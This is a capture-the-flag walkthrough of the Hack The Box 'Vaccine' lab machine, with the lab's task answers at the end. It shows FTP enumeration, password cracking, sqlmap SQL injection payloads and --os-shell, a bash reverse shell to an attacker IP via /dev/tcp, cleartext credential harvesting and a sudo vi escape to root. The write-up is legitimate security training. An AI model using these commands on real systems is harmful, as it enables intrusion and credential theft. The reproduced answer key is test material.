#14 Vaccine - Starting Point - Hack The Box || Complete Walkthrough

Penetration testing is not simple, it requires lots of technical knowledge and the capability to think outside of the box. Sometimes you will find simple yet dangerous vulnerabilities, other times you will find vulnerabilities where public exploits exist which you can use to get easy access to the system. 


The reality is, most of the time you will need to have many different vulnerabilities and misconfigurations where you will have to chain them all together in order to access the system of the target machine, or you will have a system that doesn't have vulnerabilities, but it has a weak password which might grant you access to the system. 

The vaccine is the machine that teaches us how enumeration is always the key, even if the system seems to be secure. Apart from that, it also teaches us how important is password cracking, it's surprising to know that not everyone has strong passwords.


Enumeration

Click on Spawn Machine to Find out the TARGET IP.

Just, as usual, we start off with the Nmap scan:

┌──(mrdev㉿mrdev)-[~]
└─$ nmap -sC -sV 10.129.57.185
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-29 00:51 IST 
Nmap scan report for 10.129.57.185
Host is up (0.32s latency).
Not shown: 996 closed tcp ports (conn-refused) 
PORT     STATE    SERVICE VERSION
21/tcp   open     ftp     vsftpd 3.0.3 
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_ - rwxr-xr-x    1 0        0            2533 Apr 13  2021 backup.zip
| ftp-syst:                                         
|   STAT:                                
| FTP server status: 
|      Connected to ::ffff:10.10.14.183       
|      Logged in as ftpuser
|      TYPE: ASCII    
|      No session bandwidth limit  
|      Session timeout in seconds is 300 
|      Control connection is plain text 
|      Data connections will be plain text    
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable 
|_End of status  
22/tcp   open     ssh     OpenSSH 8.0p1 Ubuntu 6ubuntu0.1 (Ubuntu Linux; protocol 2.0)  
| ssh-hostkey:=
|   3072 c0:ee:58:07:75:34:b0:0b:91:65:b2:59:56:95:27:a4 (RSA)  
|   256 ac:6e:81:18:89:22:d7:a7:41:7d:81:4f:1b:b8:b2:51 (ECDSA)    
|_  256 42:5b:c3:21:df:ef:a2:0b:c9:5e:03:42:1d:69:d0:28 (ED25519)
80/tcp   open     http    Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
|   /: 
|     PHPSESSID:
|_      httponly flag not set
|_http-title: MegaCorp Login
|_http-server-header: Apache/2.4.41 (Ubuntu)
2008/tcp filtered conf
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 50.67 seconds
┌──(mrdev㉿mrdev)-[~]   
└─$  

There are three ports open, they are 21 (FTP), 22 (SSH), and 80 (HTTP)

Since we don't have any credentials for the SSH service, we will start off with an enumeration of port 21, since the Nmap shows that it allows anonymous login.

To Learn More: 

How a Hacker Attempts to Log in Using Credential Stuffing and Brute Force Attacks

This article delves into the techniques hackers use to attempt unauthorized login into systems using credential stuffing and brute force attacks. It provides insights into the methods employed by attackers and offers guidance on how organizations can defend against such threats.


Accessing FTP Server Anonymously with FTP Client Tool

We can see that there is a backup.zip file available, we will have to download it. It will be located in the folder from where we established the FTP connection

┌──(mrdev㉿mrdev)-[~]
└─$ ftp 10.129.57.185  
Connected to 10.129.57.185.
220 (vsFTPd 3.0.3)
Name (10.129.57.185:mrdev): Anonymous
331 Please specify the password.
Password:          #password Not required
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files. 
ftp> dir        # List the Files and Directory
229 Entering Extended Passive Mode (|||10967|) 
150 Here comes the directory listing.
-rwxr-xr-x    1 0        0            2533 Apr 13  2021 backup.zip   
226 Directory send OK. 
ftp> get backup.zip         # Download the backup.zip file
local: backup.zip remote: backup.zip
229 Entering Extended Passive Mode (|||10129|)
150 Opening BINARY mode data connection for backup.zip (2533 bytes).
100% |**************************************************************************|  2533      514.05 KiB/s    00:00 ETA 226 Transfer complete.
2533 bytes received in 00:00 (7.79 KiB/s) 
ftp> bye 
221 Goodbye.
┌──(mrdev㉿mrdev)-[~]    
└─$  

Run the ls command to list if the file was downloaded or not:

┌──(mrdev㉿mrdev)-[~]  
└─$ ls
backup.zip   Document    nc.exe    prod.dtsConfig            wordlists
Desktop     Downloads   impacket  pass.txt  Public          thinclient_drives 
dirbuster   forloop.sh  Music     Pictures  rockyou.txt     Videos  

We will try to unzip the backup.zip file with the command unzip :

┌──(mrdev㉿mrdev)-[~]
└─$ unzip backup.zip   
Archive:  backup.zip 
[backup.zip] index.php password:    # The compressed Archive ask to input password
skipping: index.php               incorrect password
skipping: style.css               incorrect password  
┌──(mrdev㉿mrdev)-[~]
└─$

We will have to somehow crack the password. The tool we will use for this task is named John the Ripper.

  • Learn More: 

John the Ripper and Johnny: Usage and Example

This article provides guidance on using John the Ripper and Johnny, two popular password cracking tools. It covers their usage and provides examples to illustrate how to effectively utilize these tools for password cracking and security testing purposes.


Decrypting Password-Protected ZIP Files with John The Ripper

John the Ripper comes pre-installed with Parrot OS & Kali Linux, however, if you don't have it, you can install it from the repository.

# sudo apt-get install john

To successfully crack the password, we will have to convert the ZIP into the hash using the zip2john module that comes within John the Ripper .

┌──(mrdev㉿mrdev)-[~]
└─$ zip2john backup.zip > hash

Once you find out the hash file run the below command to load the wordlist and it will do a brute force attack against the hash stored in file hashes.

┌──(mrdev㉿mrdev)-[~]  
└─$ john --wordlist=rockyou.txt  hashes    
Using default input encoding: UTF-8    
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads   
Press 'q' or Ctrl-C to abort, almost any other key for status 
741852963         (backup.zip)
1g 0:00:00:00 DONE (2021-12-29 01:08) 1.694g/s 13884p/s 13884c/s 13884C/s 123456..whitetiger 
Use the "--show" option to display all of the cracked passwords reliably 
Session completed.
┌──(mrdev㉿mrdev)-[~]
└─$

We can see the cracked password: 741852963

Now run the unzip command to extract the files.

┌──(mrdev㉿mrdev)-[~]
└─$ unzip backup.zip  
Archive:  backup.zip
[backup.zip] index.php password:  741852963
inflating: index.php   
inflating: style.css     
┌──(mrdev㉿mrdev)-[~]   
└─$ ls  
backup.zip  Documents   hashes     Music     Pictures        rockyou.txt  thinclient_drives 
Desktop     Downloads   impacket   nc.exe    prod.dtsConfig  style.css     Videos  
dirbuster   forloop.sh  index.php   pass.txt  Public          Templates    wordlists     
┌──(mrdev㉿mrdev)-[~]   
└─$

We will now read the index.php file first.

┌──(mrdev㉿mrdev)-[~]   
└─$ cat index.php 
<!DOCTYPE html>  
<?php  
  session_start(); 
  if(isset($_POST['username']) && isset($_POST['password'])) {  
  if($_POST['username'] === 'admin' && md5($_POST['password']) === " 2cb42f8734ea607eefed3b70af13bbd3 ") { 
  $_SESSION['login'] = "true";   
  header("Location: dashboard.php");  
     }   
   }     
?>
.............................................<more>.............................................................     

We can see the credentials of the admin , which we might be able to use. But the password seems hashed. We have identified that the hash is in the form of MD5, let's try to crack it online (https://crackstation.net/).

The cracked password is qwerty789. Now we will start our web browser to enumerate port 80, see where can we log in.

We can see the login page, by supplying the previously found username & cracked password, we managed to log in successfully!


Foothold

So the dashboard has nothing special in it, however, it has a catalog, which might be connected to the database.

Let's create any query:

By checking the URL, we can see that there is a variable search that is responsible for searching through the catalog. We could test it to see if it's SQL injectable, but instead of doing it manually, we will use a tool called sqlmap.

Learn More about SQL injection:

SQL Injection

This article delves into SQL injection, a prevalent web security vulnerability, explaining its mechanisms, risks, and mitigation techniques. Understanding SQL injection is crucial for developing secure web applications and protecting them from exploitation.


Acquiring OS Shell Access via SQL Injection with SQL Map

The sqlmap comes pre-installed with Parrot OS & Kali Linux, however, you can install it through the repository if you don't have it then run the following command:

# sudo apt-get install sqlmap

To see how to use it, we will type the following command:

┌─[mrdev@TS]─[~]
└──╼ $ sqlmap --help
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.5.12#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

Usage: python3 sqlmap [options]

Options:
  -h, --help            Show basic help message and exit
  -hh                   Show advanced help message and exit
  --version             Show program's version number and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)

  Target:
    At least one of these options has to be provided to define the
    target(s)

    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    -g GOOGLEDORK       Process Google dork results as target URLs

  Request:
    These options can be used to specify how to connect to the target URL

    --data=DATA         Data string to be sent through POST (e.g. "id=1")
    --cookie=COOKIE     HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
    --random-agent      Use randomly selected HTTP User-Agent header value
    --proxy=PROXY       Use a proxy to connect to the target URL
    --tor               Use Tor anonymity network
    --check-tor         Check to see if Tor is used properly

  Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts

    -p TESTPARAMETER    Testable parameter(s)
    --dbms=DBMS         Force back-end DBMS to provided value

  Detection:
    These options can be used to customize the detection phase

    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK         Risk of tests to perform (1-3, default 1)

  Techniques:
    These options can be used to tweak testing of specific SQL injection
    techniques

    --technique=TECH..  SQL injection techniques to use (default "BEUSTQ")

  Enumeration:
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables

    -a, --all           Retrieve everything
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --passwords         Enumerate DBMS users password hashes
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table(s) to enumerate
    -C COL              DBMS database table column(s) to enumerate

  Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system

    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an OOB shell, Meterpreter or VNC

  General:
    These options can be used to set some general working parameters

    --batch             Never ask for user input, use the default behavior
    --flush-session     Flush session files for current target

  Miscellaneous:
    These options do not fit into any other category

    --wizard            Simple wizard interface for beginner users
┌─[mrdev@TS]─[~]
└──╼ $

We will provide the URL & the cookie to the sqlmap in order for it to find the vulnerability. The reason why we have to provide a cookie is because of authentication.

To grab the cookie, we can intercept any request in Burp Suite & get it from there, however, you can install a great extension for your web browser called cookie-editor.

Once the installation is complete you can copy cookies from the cookie editor . The cookies in HTTP messages of requests are usually set the following way.

Open the terminal and type the following command:

┌──(mrdev㉿mrdev)-[~] 
└─$ sqlmap -u 'http://10.129.57.185/dashboard.php?search=any+query' --cookie="PHPSESSID=t6m2fbdvuoq41dov97pobkd3ku"

There will be some questions that the tool will ask you, you can respond with 'Yes ' or 'No', or just by pressing ENTER for the default answer.

        ___
       __H__  
 ___ ___[,]_____ ___ ___  {1.5.12#stable}   
|_ -| . [']     | .'| . |    
|___|_  [)]_|_|_|__,|  _|  
|_|V...       |_|   https://sqlmap.org 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program    
[*] starting @ 01:50:33 /2021-12-29/
[01:50:35] [INFO] testing connection to the target URL 
[01:50:36] [INFO] checking if the target is protected by some kind of WAF/IPS  
[01:50:37] [INFO] testing if the target URL content is stable
[01:50:38] [INFO] target URL content is stable  
[01:50:38] [INFO] testing if GET parameter 'search' is dynamic
[01:50:38] [WARNING] GET parameter 'search' does not appear to be dynamic    
[01:50:39] [INFO] heuristic (basic) test shows that GET parameter 'search' might be injectable (possible DBMS: 'PostgreSQL')
[01:50:39] [INFO] testing for SQL injection on GET parameter 'search'
it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y  
for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (1) and risk (1) values? [Y/n] Y
[01:51:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:51:19] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[01:51:20] [INFO] testing 'Generic inline queries'
[01:51:20] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'  
[01:51:22] [INFO] GET parameter 'search' appears to be 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)' injectable
[01:51:22] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' 
[01:51:23] [INFO] GET parameter 'search' is 'PostgreSQL AND error-based - WHERE or HAVING clause' injectable
[01:51:23] [INFO] testing 'PostgreSQL inline queries'
[01:51:23] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'   
[01:51:23] [WARNING] time-based comparison requires larger statistical model, please wait..... (done) 
[01:51:36] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable 
[01:51:36] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'  
[01:51:47] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 AND time-based blind' injectable  
[01:51:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'   
GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y   

Out of this output, the thing that is important to us is the following:

GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

The tool confirmed that the target is vulnerable to SQL injection, which is everything we needed to know. 

GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y  
sqlmap identified the following injection point(s) with a total of 34 HTTP(s) requests: 
---
Parameter: search (GET)
Type: boolean-based blind    
Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
Payload: search=any query' AND (SELECT (CASE WHEN (3932=3932) THEN NULL ELSE CAST((CHR(73)||CHR(76)||CHR(89)||CHR(65)) AS NUMERIC) END)) IS NULL-- BeDf
Type: error-based  
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: search=any query' AND 6776=CAST((CHR(113)||CHR(113)||CHR(98)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (6776=6776) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(120)||CHR(120)||CHR(113)) AS NUMERIC)-- xFOh
Type: stacked queries  
Title: PostgreSQL > 8.1 stacked queries (comment)  
Payload: search=any query';SELECT PG_SLEEP(5)--  
Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind 
Payload: search=any query' AND 7887=(SELECT 7887 FROM PG_SLEEP(5))-- qpAd 
---
[01:51:51] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 20.04 or 19.10 or 20.10 (focal or eoan) 
web application technology: Apache 2.4.41 
[01:51:54] [INFO] fetched data logged to text files under '/home/mrdev/.local/share/sqlmap/output/10.129.57.185' 
[*] ending @ 01:51:54 /2021-12-29/  
┌──(mrdev㉿mrdev)-[~]   
└─$  

Now, we will run the sqlmap once more, where we are going to provide the --os-shell flag, where we will be able to perform command injection.

┌──(mrdev㉿mrdev)-[~]   
└─$ sqlmap -u 'http://10.129.57.185/dashboard.php?search=any+query' --cookie="PHPSESSID=t6m2fbdvuoq41dov97pobkd3ku" --os-shell 
        ___
       __H__  
 ___ ___[)]_____ ___ ___  {1.5.12#stable}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
|_|V...       |_|   https://sqlmap.org  
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 02:14:36 /2021-12-29/ 
[02:14:36] [INFO] resuming back-end DBMS 'postgresql'
[02:14:36] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---  
Parameter: search (GET) 
Type: boolean-based blind  
Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
Payload: search=any query' AND (SELECT (CASE WHEN (3932=3932) THEN NULL ELSE CAST((CHR(73)||CHR(76)||CHR(89)||CHR(65)) AS NUMERIC) END)) IS NULL-- BeDf  
Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause  
Payload: search=any query' AND 6776=CAST((CHR(113)||CHR(113)||CHR(98)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (6776=6776) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(120)||CHR(120)||CHR(113)) AS NUMERIC)-- xFOh
Type: stacked queries 
Title: PostgreSQL > 8.1 stacked queries (comment) 
Payload: search=any query';SELECT PG_SLEEP(5)--   
Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind  
Payload: search=any query' AND 7887=(SELECT 7887 FROM PG_SLEEP(5))-- qpAd 
---      
[02:14:38] [INFO] the back-end DBMS is PostgreSQL     
web server operating system: Linux Ubuntu 19.10 or 20.04 or 20.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL 
[02:14:38] [INFO] fingerprinting the back-end DBMS operating system
[02:14:39] [INFO] the back-end DBMS operating system is Linux 
[02:14:40] [INFO] testing if current user is DBA    
[02:14:40] [INFO] retrieved: '1'
[02:14:41] [INFO] going to use 'COPY ... FROM PROGRAM ...' command execution
[02:14:41] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER  
os-shell>

We got the shell, however, it is not very stable & interactive. 


Establishing Reverse Shell via OS Shell Obtained from SQLMap

To make it much more stable, we will use the reverse shell payload:

os-shell> bash -c "bash -i >& /dev/tcp/10.10.14.183/443 0>&1"

Before running this you have turned on the Netcat listener on the port that you mentioned:

Microsoft Windows [Version 10.0.19044.1288]
(c) Microsoft Corporation. All rights reserved.
D:\netcat-win32-1.11_1\netcat-1.11> nc -lvnp 443
listening on [any] 443 ...

Once the Netcat is turned on, we will execute the payload:

os-shell> bash -c "bash -i >& /dev/tcp/10.10.14.183/443 0>&1" 
do you want to retrieve the command standard output? [Y/n/a] Y
[02:15:18] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s) 

Let me check if the connection is established or not:

Microsoft Windows [Version 10.0.19044.1288]
(c) Microsoft Corporation. All rights reserved.
D:\netcat-win32-1.11_1\netcat-1.11>nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.183] from (UNKNOWN) [10.129.57.185] 50306   
bash: cannot set terminal process group (3472): Inappropriate ioctl for device
bash: no job control in this shell  
postgres@vaccine:/var/lib/postgresql/11/main$ whoami   
whoami    
postgres    
postgres@vaccine:/var/lib/postgresql/11/main$

We got the foothold. We will quickly make our shell fully interactive:

postgres@vaccine:/var/lib/postgresql/11/main$ SHELL=/bin/bash script -q /dev/null
<gresql/11/main$ SHELL=/bin/bash script -q /dev/null   
postgres@vaccine:/var/lib/postgresql/11/main$

Finally, we have the fully interactive shell now.


Privilege Escalation

We are users of Postgres, but we don't know the password for it, which means we cannot check our sudo privileges. We will try to find the password in the html folder, since the machine uses both PHP & SQL, meaning that there should be credentials in cleartext:

Before that, I have to change back the directories to the home directory:

postgres@vaccine:/var/lib/postgresql/11/main$ cd ../../../../..
cd ../../../../..
postgres@vaccine:/$ cd /var/www/html 
cd /var/www/html
postgres@vaccine:/var/www/html$ ls  
ls
bg.png         dashboard.js   index.php    style.css 
dashboard.css  dashboard.php   license.txt  
postgres@vaccine:/var/www/html$

Now let me read the dashboard.php file using the cat command:

postgres@vaccine:/var/www/html$ cat dashboard.php
cat dashboard.php  
<!-----------more---------------------->
try { 
   $conn = pg_connect("host=localhost port=5432 dbname=carsdb user= postgres password= P@s5w0rd! ");
}
<!-----------more---------------------->
postgres@vaccine:/var/www/html$

As you can see we found the username and password, so we will use SSH to get a log-in session:

┌──(mrdev㉿mrdev)-[~]
└─$ ssh [email protected] 
[email protected]'s password:  P@s5w0rd!
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-64-generic x86_64)
* Documentation:  https://help.ubuntu.com  
* Management:     https://landscape.canonical.com  
* Support:        https://ubuntu.com/advantage   
System information as of Tue 28 Dec 2021 09:24:36 PM UTC 
System load:  0.0               Processes:             187   
Usage of /:   32.6% of 8.73GB   Users logged in:       0 
Memory usage: 19%               IP address for ens160: 10.129.57.185    
Swap usage:   0%  
0 updates can be installed immediately.    
0 of these updates are security updates. 
The list of available updates is more than a week old. 
To check for new updates run: sudo apt update    
Failed to connect to https://changelogs.ubuntu.com/meta-release. Check your Internet connection or proxy settings
Last login: Tue Dec 28 21:02:11 2021 from 10.10.14.183  
postgres@vaccine:~$

You can find out the user flag from here:

postgres@vaccine:~$ ls
11  user.txt   
postgres@vaccine:~$ cat user.txt
ec*************************7
postgres@vaccine:~$

we will type the sudo -l to see what privileges we have:

postgres@vaccine:~$ sudo -l
[sudo] password for postgres:     
Matching Defaults entries for postgres on vaccine:
env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH", 
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass    
User postgres may run the following commands on vaccine: 
(ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf 
postgres@vaccine:~$


sudo privilege escalation via vi editor (CVE-2019-14287)

So we have sudo privileges to edit the  /etc/postgresql/11/main/pg_hba.conf  file using vi (/bin/vi) text editor add " !/bin/bash " and hit Enter.

The root flag can be obtained in the root folder:

root@vaccine:/var/lib/postgresql# whoami    
root    
root@vaccine:/var/lib/postgresql# cd /root
root@vaccine:~# ls    
pg_hba.conf  root.txt   snap      
root@vaccine:~# cat root.txt   
dd****************************9   
root@vaccine:~# 

We successfully got the root flag, congratulations!


Task Answers


TASK 1: Besides SSH and HTTP, what other service is hosted on this box?

Ans. FTP

TASK 2: This service can be configured to allow login with any password for a specific username. What is that username?

Ans. anonymous

TASK 3: What is the name of the file downloaded over this service?

Ans. backup.zip

TASK 4: What script comes with the John The Ripper toolset and generates a hash from a password-protected zip archive in a format to allow for cracking attempts?

Ans. zip2john


TASK 5: What is the password for the admin user on the website?

Ans. qwerty789

TASK 6: What option can be passed to sqlmap to try to get command execution via the sql injection?

Ans. --os-shell

TASK 7: What program can the postgres user run as root using sudo?

Ans. vi

Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.

#buttons=(Ok, Go it!) #days=(20)

Our website uses cookies to enhance your experience. Learn More
Ok, Go it!